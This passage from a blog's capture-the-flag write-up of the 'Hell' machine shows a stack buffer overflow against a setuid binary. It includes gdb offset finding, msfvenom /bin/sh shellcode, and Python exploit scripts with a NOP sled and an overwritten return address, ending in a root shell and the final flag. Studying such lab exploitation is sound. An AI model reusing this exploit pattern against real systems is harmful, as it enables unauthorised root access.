(&quot;%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\n0016| 0x7fffffffe028 (&quot;A%JA%fA%5A%KA%gA%6A%&quot;)\n0024| 0x7fffffffe030 (&quot;5A%KA%gA%6A%&quot;)\n0032| 
0x7fffffffe038 --&gt; 0x7f0025413625 \n0040| 0x7fffffffe040 --&gt; 0x0 \n0048| 0x7fffffffe048 --&gt; 0x4011b6 (&lt;main&gt;:      endbr64)\n0056| 0x7fffffffe050 --&gt; 0x200000000 \n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x0000000000401297 in overflow ()<\/code><\/pre>\n<h4>Finding the offset<\/h4>\n<pre><code class=\"language-bash\">gdb-peda$ x\/x $rsp\n0x7fffffffe018: 0x4133254164254148\ngdb-peda$ x\/wx $rsp\n0x7fffffffe018: 0x64254148\ngdb-peda$ pattern_offset 0x64254148\n1680163144 found at offset: 264<\/code><\/pre>\n<p>So the <code>offset<\/code> is 264.<\/p>\n<h4>Trying to verify it<\/h4>\n<p>First generate a shellcode:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ msfvenom -p linux\/x64\/exec CMD=\/bin\/sh -f python -v shellcode\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 44 bytes\nFinal size of python file: 261 bytes\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x99&quot;\nshellcode += b&quot;\\x50\\x54\\x5f\\x52\\x66\\x68\\x2d\\x63\\x54\\x5e\\x52&quot;\nshellcode += b&quot;\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x73&quot;\nshellcode += b&quot;\\x68\\x00\\x56\\x57\\x54\\x5e\\x6a\\x3b\\x58\\x0f\\x05&quot;<\/code><\/pre>\n<p>The payload is 44 bytes long, and <code>264-44=220<\/code>, so try debugging with this:<\/p>\n<pre><code class=\"language-python\"># exp.py\n# note: in Python 3, print(payload) writes the text repr b&#039;\\x90...&#039; rather than the raw bytes\nnop = b&#039;\\x90&#039; * 220\nrip = b&#039;B&#039;*6\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x99&quot;\nshellcode += 
b&quot;\\x50\\x54\\x5f\\x52\\x66\\x68\\x2d\\x63\\x54\\x5e\\x52&quot;\nshellcode += b&quot;\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x73&quot;\nshellcode += b&quot;\\x68\\x00\\x56\\x57\\x54\\x5e\\x6a\\x3b\\x58\\x0f\\x05&quot;\n\npayload = nop + shellcode + rip\n\nprint(payload)<\/code><\/pre>\n<p>Run it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gdb-peda -q strlen\nReading symbols from strlen...\n(No debugging symbols found in strlen)\ngdb-peda$ run $(python3 exp.py)\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffdc80 (&quot;b&#039;\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nRBX: 0x7fffffffdeb8 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nRCX: 0x15 \nRDX: 0x200400 \nRSI: 0x7fffffffe4ff (&quot;90H\\\\xb8\/bin\/sh\\\\x00\\\\x99PT_Rfh-cT^R\\\\xe8\\\\x08\\\\x00\\\\x00\\\\x00\/bin\/sh\\\\x00VWT^j;X\\\\x0f\\\\x05BBBBBB&#039;&quot;)\nRDI: 0x7fffffffdff0 (&quot;90H\\\\xb8\/bin\/sh\\\\x00\\\\x99PT_Rfh-cT^R\\\\xe8\\\\x08\\\\x00\\\\x00\\\\x00\/bin\/sh\\\\x00VWT^j;X\\\\x0f\\\\x05BBBBBB&#039;&quot;)\nRBP: 0x785c3039785c3039 (&#039;90\\\\x90\\\\x&#039;)\nRSP: 0x7fffffffdd88 
(&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nRIP: 0x401297 (&lt;overflow+117&gt;:  ret)\nR8 : 0x75 (&#039;u&#039;)\nR9 : 0x0 \nR10: 0x7ffff7dd3238 --&gt; 0x10001a00004244 \nR11: 0x7ffff7f1f090 (&lt;__strcpy_avx2&gt;:   vpxor  xmm7,xmm7,xmm7)\nR12: 0x0 \nR13: 0x7fffffffded0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nR14: 0x403220 --&gt; 0x401180 (&lt;__do_global_dtors_aux&gt;:    endbr64)\nR15: 0x7ffff7ffd000 --&gt; 0x7ffff7ffe2c0 --&gt; 0x0\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n   0x401290 &lt;overflow+110&gt;:     call   0x401080 &lt;strcpy@plt&gt;\n   0x401295 &lt;overflow+115&gt;:     nop\n   0x401296 &lt;overflow+116&gt;:     leave\n=&gt; 0x401297 &lt;overflow+117&gt;:     ret\n   0x401298 &lt;_fini&gt;:    endbr64\n   0x40129c &lt;_fini+4&gt;:  sub    rsp,0x8\n   0x4012a0 &lt;_fini+8&gt;:  add    rsp,0x8\n   0x4012a4 &lt;_fini+12&gt;: ret\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffdd88 
(&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0008| 0x7fffffffdd90 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0016| 0x7fffffffdd98 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0024| 0x7fffffffdda0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0032| 0x7fffffffdda8 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0040| 0x7fffffffddb0 
(&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0048| 0x7fffffffddb8 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0056| 0x7fffffffddc0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x0000000000401297 in overflow ()<\/code><\/pre>\n<p>This is not what I expected. The script from the blog post referenced earlier, on the other hand, gives the following:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python2\n\noffset = 264\n\nshellcode  = b&quot;&quot;\nshellcode += b&quot;\\x6a\\x3b\\x58\\x99\\x52\\x48\\xbb\\x2f&quot;\nshellcode += b&quot;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x53&quot;\nshellcode += b&quot;\\x54\\x5f\\x52\\x57\\x54\\x5e\\x0f\\x05&quot;\n\njunk = b&quot;\\x90&quot; * (offset - len(shellcode))\n\nrip = b&quot;B&quot; * 6\n\nprint(junk + shellcode + rip)<\/code><\/pre>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543132.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543132.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417044457551\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>We can see that RIP is filled exactly!<\/p>\n<p>And the lengths are not even the same....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543133.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543133.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417045928982\" 
\/><\/div><\/p>\n<p>I do not know where the mistake is yet, but it must be something very silly; I will look into it again later. It is too late now, so let me finish this first and rest.<\/p>\n<h4>Finding a RIP address<\/h4>\n<p>Just pick an address whose contents are all <code>\\x90<\/code>:<\/p>\n<pre><code class=\"language-bash\">gdb-peda$ x\/300wx $rsp\n0x7fffffffe040: 0xffffe168      0x00007fff      0x00000000      0x00000002\n0x7fffffffe050: 0x00000002      0x00000000      0xf7df16ca      0x00007fff\n0x7fffffffe060: 0x00000000      0x00000000      0x004011b6      0x00000000\n0x7fffffffe070: 0x00000000      0x00000002      0xffffe168      0x00007fff\n0x7fffffffe080: 0xffffe168      0x00007fff      0x48a287ac      0x890729ff\n0x7fffffffe090: 0x00000000      0x00000000      0xffffe180      0x00007fff\n0x7fffffffe0a0: 0x00403220      0x00000000      0xf7ffd000      0x00007fff\n0x7fffffffe0b0: 0x886687ac      0x76f8d600      0x65a287ac      0x76f8c641\n0x7fffffffe0c0: 0x00000000      0x00000000      0x00000000      0x00000000\n0x7fffffffe0d0: 0x00000000      0x00000000      0xffffe168      0x00007fff\n0x7fffffffe0e0: 0xffffe168      0x00007fff      0xa2240900      0x0a9d2671\n0x7fffffffe0f0: 0x0000000e      0x00000000      0xf7df1785      0x00007fff\n0x7fffffffe100: 0x004011b6      0x00000000      0x00403220      0x00000000\n0x7fffffffe110: 0x00000000      0x00000000      0x00000000      0x00000000\n0x7fffffffe120: 0x00000000      0x00000000      0x004010d0      0x00000000\n0x7fffffffe130: 0xffffe160      0x00007fff      0x00000000      0x00000000\n0x7fffffffe140: 0x00000000      0x00000000      0x004010f5      0x00000000\n0x7fffffffe150: 0xffffe158      0x00007fff      0x00000038      0x00000000\n0x7fffffffe160: 0x00000002      0x00000000      0xffffe42b      0x00007fff\n0x7fffffffe170: 0xffffe447      0x00007fff      0x00000000      
0x00000000\n0x7fffffffe180: 0xffffe556      0x00007fff      0xffffe56b      0x00007fff\n0x7fffffffe190: 0xffffe589      0x00007fff      0xffffe593      0x00007fff\n0x7fffffffe1a0: 0xffffe5b2      0x00007fff      0xffffe5c7      0x00007fff\n0x7fffffffe1b0: 0xffffe5dc      0x00007fff      0xffffe5fa      0x00007fff\n0x7fffffffe1c0: 0xffffe602      0x00007fff      0xffffe612      0x00007fff\n0x7fffffffe1d0: 0xffffe621      0x00007fff      0xffffe63d      0x00007fff\n0x7fffffffe1e0: 0xffffe650      0x00007fff      0xffffe669      0x00007fff\n0x7fffffffe1f0: 0xffffe69f      0x00007fff      0xffffe6c2      0x00007fff\n0x7fffffffe200: 0xffffe6cf      0x00007fff      0xffffe6e7      0x00007fff\n0x7fffffffe210: 0xffffe705      0x00007fff      0xffffe71c      0x00007fff\n0x7fffffffe220: 0xffffe730      0x00007fff      0xffffe742      0x00007fff\n0x7fffffffe230: 0xffffe7b9      0x00007fff      0xffffe7d8      0x00007fff\n0x7fffffffe240: 0xffffe7f3      0x00007fff      0xffffe804      0x00007fff\n0x7fffffffe250: 0xffffef27      0x00007fff      0xffffef3a      0x00007fff\n0x7fffffffe260: 0xffffef52      0x00007fff      0xffffef6a      0x00007fff\n0x7fffffffe270: 0xffffef83      0x00007fff      0xffffef98      0x00007fff\n0x7fffffffe280: 0xffffefc7      0x00007fff      0xffffefd0      0x00007fff\n0x7fffffffe290: 0x00000000      0x00000000      0x00000021      0x00000000\n0x7fffffffe2a0: 0xf7fc9000      0x00007fff      0x00000033      0x00000000\n0x7fffffffe2b0: 0x000006f0      0x00000000      0x00000010      0x00000000\n0x7fffffffe2c0: 0x178bfbff      0x00000000      0x00000006      0x00000000\n0x7fffffffe2d0: 0x00001000      0x00000000      0x00000011      0x00000000\n0x7fffffffe2e0: 0x00000064      0x00000000      0x00000003      0x00000000\n0x7fffffffe2f0: 0x00400040      0x00000000      0x00000004      0x00000000\n0x7fffffffe300: 0x00000038      0x00000000      0x00000005      0x00000000\n0x7fffffffe310: 0x0000000c      0x00000000      0x00000007      
0x00000000\n0x7fffffffe320: 0xf7fcb000      0x00007fff      0x00000008      0x00000000\n0x7fffffffe330: 0x00000000      0x00000000      0x00000009      0x00000000\n0x7fffffffe340: 0x004010d0      0x00000000      0x0000000b      0x00000000\n0x7fffffffe350: 0x000003e8      0x00000000      0x0000000c      0x00000000\n0x7fffffffe360: 0x000003e8      0x00000000      0x0000000d      0x00000000\n0x7fffffffe370: 0x000003e8      0x00000000      0x0000000e      0x00000000\n0x7fffffffe380: 0x000003e8      0x00000000      0x00000017      0x00000000\n0x7fffffffe390: 0x00000000      0x00000000      0x00000019      0x00000000\n0x7fffffffe3a0: 0xffffe409      0x00007fff      0x0000001a      0x00000000\n0x7fffffffe3b0: 0x00000002      0x00000000      0x0000001f      0x00000000\n0x7fffffffe3c0: 0xffffefdc      0x00007fff      0x0000000f      0x00000000\n0x7fffffffe3d0: 0xffffe419      0x00007fff      0x0000001b      0x00000000\n0x7fffffffe3e0: 0x0000001c      0x00000000      0x0000001c      0x00000000\n0x7fffffffe3f0: 0x00000020      0x00000000      0x00000000      0x00000000\n0x7fffffffe400: 0x00000000      0x00000000      0x2409ec00      0x9d2671a2\n0x7fffffffe410: 0xffa4530a      0xd6448394      0x36387843      0x0034365f\n0x7fffffffe420: 0x00000000      0x00000000      0x2f000000      0x656d6f68\n0x7fffffffe430: 0x6c616b2f      0x65742f69      0x482f706d      0x2f6c6c65\n0x7fffffffe440: 0x6c727473      0x90006e65      0x90909090      0x90909090\n0x7fffffffe450: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe460: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe470: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe480: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe490: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4a0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4b0: 0x90909090      0x90909090      0x90909090      
0x90909090\n0x7fffffffe4c0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4d0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4e0: 0x90909090      0x90909090      0x90909090      0x90909090<\/code><\/pre>\n<p>Here I choose <code>0x7fffffffe460<\/code>:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python2\nfrom pwn import *\n\noffset = 264\nshellcode  = b&quot;&quot;\nshellcode += b&quot;\\x6a\\x3b\\x58\\x99\\x52\\x48\\xbb\\x2f&quot;\nshellcode += b&quot;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x53&quot;\nshellcode += b&quot;\\x54\\x5f\\x52\\x57\\x54\\x5e\\x0f\\x05&quot;\n# NOP sled fills the rest of the 264 bytes up to the saved return address\nnop = b&quot;\\x90&quot; * (offset - len(shellcode))\n# new return address, written little-endian\nrip = b&quot;\\x60\\xe7\\xff\\xff\\xff\\x7f&quot;\n\nprint(nop + shellcode + rip)<\/code><\/pre>\n<h3>Run it to get the last flag [11]<\/h3>\n<pre><code class=\"language-bash\">gato@hell:\/tmp$ \/opt\/projects\/strlen $(python2 exploit2.py)\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[*] String: 
\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdj;X\ufffdRH\ufffd\/\/bin\/shST_RWT^p\ufffd\ufffd\ufffd\ufffd\n\n[+] Length: 270\n\n# whoami;id\nroot\nuid=0(root) gid=1000(gato) groups=1000(gato)\n# bash\nroot@hell:\/tmp# cd \/root\nroot@hell:\/root# ls -la\ntotal 48\ndrwx------  7 root root 4096 Feb 16  2023 .\ndrwxr-xr-x 19 root root 4096 Feb 16  2023 ..\nlrwxrwxrwx  1 root root    9 Feb 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3771 Feb 15  2023 .bashrc\ndrwx------  5 root root 4096 Feb 16  2023 .cache\ndrwxr-xr-x  3 root root 4096 Feb 15  2023 .config\n-rw-r--r--  1 root 
root   30 Feb 15  2023 .gdbinit\n-rw-------  1 root root   20 Feb 16  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Feb 15  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root    0 Feb 16  2023 .selected_editor\ndrwx------  2 root root 4096 Feb 16  2023 .ssh\ndrwxr-xr-x  2 root root 4096 Feb 16  2023 containers\n-rw-r--r--  1 root root  733 Feb 16  2023 flag.txt\nroot@hell:\/root# cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003 \u2003\u2588 \u2588\u2003\u2588\u2580\u2580\u2003\u2588  \u2003\u2588  \n\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003 \u2003\u2588\u2580\u2588\u2003\u2588\u2588\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2584\u2584\n\nFlag 11: HELL{0V3RF10W_F0R_B3G1NN3R5}\n\nCongratulations on completing this CTF!\n\n- Do you want to tell me what you thought or if you would add\/change anything?\n- Do you want to support me by following me on the networks?\n- Have you found any unexpected route?\n\nContact me through the following links:\n\nGithub:    https:\/\/github.com\/GatoGamer1155\nTwitter:   https:\/\/twitter.com\/GatoGamer1155\nYouTube:   https:\/\/www.youtube.com\/@GatoGamer1155\nDiscord:   https:\/\/discord.com\/users\/866396648691597374\nInstagram: https:\/\/www.instagram.com\/GatoGamer1155<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Hell The author has a readme.txt When booting the machine log in wit 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,20,21,24,19,22,18],"tags":[],"class_list":["post-577","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-crypto","category-misc","category-penetration-test","category-pwn","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/577","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=577"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/577\/revisions"}],"predecessor-version":[{"id":579,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/577\/revisions\/579"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=577"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=577"},{"taxonomy":"post_tag","embeddable":true,"h